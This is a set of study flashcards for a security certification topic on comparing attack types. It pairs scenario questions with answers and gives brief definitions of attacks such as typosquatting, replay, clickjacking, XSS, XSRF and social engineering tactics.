1.2 Compare and contrast types of attacks Flashcards
An attacker came within close proximity of a victim and sent the mobile device user spam of an unsolicited text message. Once the user clicked the link in the message, the user’s device was infected with Trojan malware. What type of attack did the hacker most likely infect the mobile user with?
Bluejacking
A social engineer intercepted an end-user’s phone call to an internet service provider (ISP) about a home internet outage. Pretending to be the caller reporting the outage, the attacker immediately contacted the ISP to cancel the service call, dressed up as an internet tech, and then proceeded to enter the end-user’s home with permission. What type of social engineering attack did the ISP and end-user fall victim to?
Impersonation
If an attacker purchases a fake domain that has a similar name of a real domain, and then uses the fake domain to send the legitimate company forged notices by email, which of the following attacks did the malicious user perform?
Typosquatting
A penetration tester cracked a company’s Wired Equivalent Privacy (WEP) access point (AP) by making the AP generate a large amount of initialization vector (IV) packets, by replaying Address Resolution Protocol (ARP) packets at it. What type of attack did the pen tester use to crack the AP?
Replay
A user entered credentials into a web application login page. Unfortunately, the login form contained a malicious invisible iFrame, that allowed the attacker to intercept the user’s input. What type of attack is this known as?
Clickjacking
Which of the following attacks do security professionals expose themselves to, if they do not salt passwords with a random value?
Rainbow table attacks
A social engineer used a phishing attack to trick users into visiting a website. Once users visit the site, a vulnerability exploit kit installs, which actively exploits vulnerabilities on the client. What type of attack did the users become a victim of?
A Man-in-the-Browser (MitB) attack
A group of college students receive a phone call from someone claiming to be from a debt consolidation firm. The solicitor tried to convince the students that for a limited time, a rare offer will expire, which could erase their student loan debt if they provide their Social Security Number and other personally identifiable information (PII). Which of the following tactics did the caller use?
Scarcity and urgency
URL hijacking (also called typosquatting)
- relies on users navigating to misspelled domains. An attacker registers a domain name with a common misspelling of an existing domain. Users who misspell a URL in the web browser are taken to the attacker’s website
- is a type of hijacking attack where the attacker steals a domain name by altering its registration information and then transferring the domain name to another entity. Sometimes referred to as brandjacking
Domain hijacking
where the attacker steals a domain name by altering its registration information and then transferring the domain name to another entity. Sometimes referred to as brandjacking
Kiting
act of continually registering, deleting, and reregistering a name within the five-day grace period without having to pay for it
Tasting
Domain Name Server (DNS) exploit that involves registering a domain temporarily to see how many hits it generates within the five-day grace period
Replay
- attacker intercepts authentication data and reuses it to re-establish a session. To crack WEP, a type of replay attack is used
- consists of intercepting a key or password hash then reusing it to gain access to a resource, such as the pass-the-hash attack
War driving
practice of using a Wi-Fi sniffer to detect WLANs and then either making use of them or trying to break into them (using WEP and WPA cracking tools)
Wi-Fi jamming
attack can be performed by setting up an AP with a stronger signal. Wi-Fi jamming devices are illegal to use and to sell. The attacker needs to gain fairly close physical proximity to the wireless network
Skimming
RFID attack where an attacker uses a fraudulent RFID reader to read the signals from a contactless bank card
Clickjacking
hijacking attack that forces a user to unintentionally click a link that is embedded in or hidden by other web page elements
MitB
where the web browser is compromised by installing malicious plug-ins or scripts or intercepting API calls. Vulnerability exploit kits can be installed to a website and actively try to exploit vulnerabilities in clients browsing the site
XSRF
malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser
Session IDs
generated using patterns (such as IP address with the date and time), making the session vulnerable to eavesdropping and possibly hijacking, by replaying the cookie to re-establish the session
Salt
Passwords not “salted” with a random value, make the ciphertext vulnerable to rainbow table attacks. A rainbow table attack is a type of password attack where an attacker uses a set of plaintext passwords and their hashes to crack passwords
dictionary attack
software enumerates values in a dictionary wordlist. Enforcing password complexity makes passwords difficult to guess and compromise. Varying the characters in the password makes it more resistant to these attacks
brute force attack
attempts every possible combination in the key space, to derive a plaintext password from a hash
hybrid password attack
targeted against naively strong passwords. The password cracking algorithm tests dictionary words and names in combination with numeric prefixes and/or suffixes
bluejacking
Bluetooth-discoverable device is vulnerable to bluejacking, similar to spam, where someone sends an unsolicited text (or picture/video) message or vCard (contact details). This can also be a vector for Trojan malware
Bluesnarfing
refers to using an exploit in Bluetooth to steal information from someone else’s phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism
rogue AP
masquerades as a legitimate one is called an evil twin or sometimes wiphishing
HTTP Response Splitting
where the attacker would craft a malicious URL and convince the victim to submit it to the web server
LSOs or Flash cookies
data that is stored on a user’s computer by websites that use Adobe Flash Player. A site may be able to track a user’s browsing behavior through LSOs
Using social engineering, an attacker called an employee to extract the name and contact information of the Chief Information Security Officer (CISO). What social engineering deception did the attacker utilize?
Vishing
A social engineer, impersonating a suppliant, rummaged through the garbage of a high-ranking loan officer, hoping to find discarded documents and removable media containing personally identifiable information (PII). Which of the following social engineering techniques did the attacker utilize?
Dumpster diving
Which of the following is an example of why viruses are destructive?
- Viruses can exploit zero days
- Viruses can spread via social engineering techniques.
A malicious user sniffed credentials exchanged between two computers by intercepting communications between them. What type of attack did the attacker execute?
A Man-in-the-Middle attack
Mutual authentication prevents a client from inadvertently submitting confidential information to a non-secure server. Mutual authentication also helps avoid which of the following? (Select two)
- Man-in-the-Middle attacks
- Session hijacking attacks
An attacker remotely compromised a closed-circuit television (CCTV) server and used it to steal a user’s password. Which of the following can help prevent this type of shoulder surfing?
A privacy filter
What type of attack can facilitate a Man-in-the-Middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths?
A downgrade attack
Worms
- spread through memory and network connections rather than infecting files
- worms are memory-resident viruses that replicate over network resources
Mutual authentication
- security mechanism that requires that each party in a communication verifies each other’s identity and helps in avoiding Man-in-the-Middle attacks
- helps in avoiding session hijacking attacks, and is a security mechanism that requires that each party in a communication verifies each other’s identity
Address Resolution Protocol (ARP) poisoning
occurs when an attacker, with access to the network, redirects an IP address to the MAC address of a computer that is not the intended recipient
IP spoofing
occurs when an attacker sends IP packets from a false (or spoofed) source address to communicate with targets
colocation
data center that contains racks with networking equipment owned by different companies
access list
held at each secure gateway records who is allowed to enter. An electronic lock may be able to log access attempts or a security guard can manually log movement
downgrade attack
used to facilitate a Man-in-the-Middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths
birthday attack
type of brute force attack aimed at exploiting collisions in hash functions. This type of attack can be used for the purpose of forging a digital signature
Man-in-the-Middle attack
form of eavesdropping where the attacker makes an independent connection between two victims and steals information to use fraudulently
An attacker exploited a vulnerability on a website frequently visited by a group of bank employees. Once the employees visit the site, the attacker’s malware infects their computers. What type of attack did the employees fall for?
A watering hole attack
A malicious user sniffed credentials exchanged between two computers by intercepting communications between them. What type of attack did the attacker execute?
A Man-in-the-Middle attack
If a hacker compromised multiple computers with Trojan malware to create a botnet, what type of attack can the hacker launch?
Distributed Denial of Service (DDoS)
If a social engineer dresses up as an internet technician, and then proceeds to enter a place of business once granted permission, what type of social engineering attack does this describe?
Impersonation
If an attacker performs open source intelligence (OSINT) gathering and social engineering on the CEO and creates an email scam for the upper management department of a company, what type of attack occurs?
Whaling
To automate and simplify the setup process of adding a wireless network, a homeowner installed a wireless access point capable of Wi-Fi Protected Setup (WPS) with an eight-character Personal Identification Number (PIN). What type of attack can a hacker perform to exploit this vulnerability?
A brute force attack
An attacker modified the HTML code of a legitimate password-change webform, then hosted the .html file on the attacker’s web server. The attacker then emailed a URL link of the hosted file to a real user of the webpage. Once the user clicked the link, it changed the user’s password to a value the attacker set. Based on this information, what type of attack is the website vulnerable to?
Cross-site Request Forgery (XSRF)
watering hole attack
directed social engineering attack. It relies on the circumstance that a group of targets may use an unsecure third party website
hoax attack
email alert or web pop-up will claim to have identified some sort of security problem, like a virus infection, and offer a tool to fix the problem, but the tool will be some sort of Trojan application
Pharming
relies on corrupting the way the victim’s computer performs Internet name resolution, so that they are redirected from the genuine site to the malicious one
Cross-site Request Forgery (XSRF)
malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser. This is successful if the server does not check if the user actually made the request
Reflected Cross-Site Scripting (XSS)
server-side input validation exploit that injects a script into a website. Once the victim visits the infected website, the malicious code executes in the user’s browser
Stored (or persistent) Cross-Site Scripting (XSS)
server-side script attack that inserts code into a back-end database used by the trusted site
Document Object Model (DOM) Cross-Site Scripting (XSS)
exploits vulnerabilities in client-side scripts to modify the content and layout of a web page
An attacker gathered Open Source Intelligence (OSINT) about a company through the internet, then contacted employees of the company and used the information gathered to extract more personally identifiable information (PII). Which of the following describes this type of social engineering attack?
Trust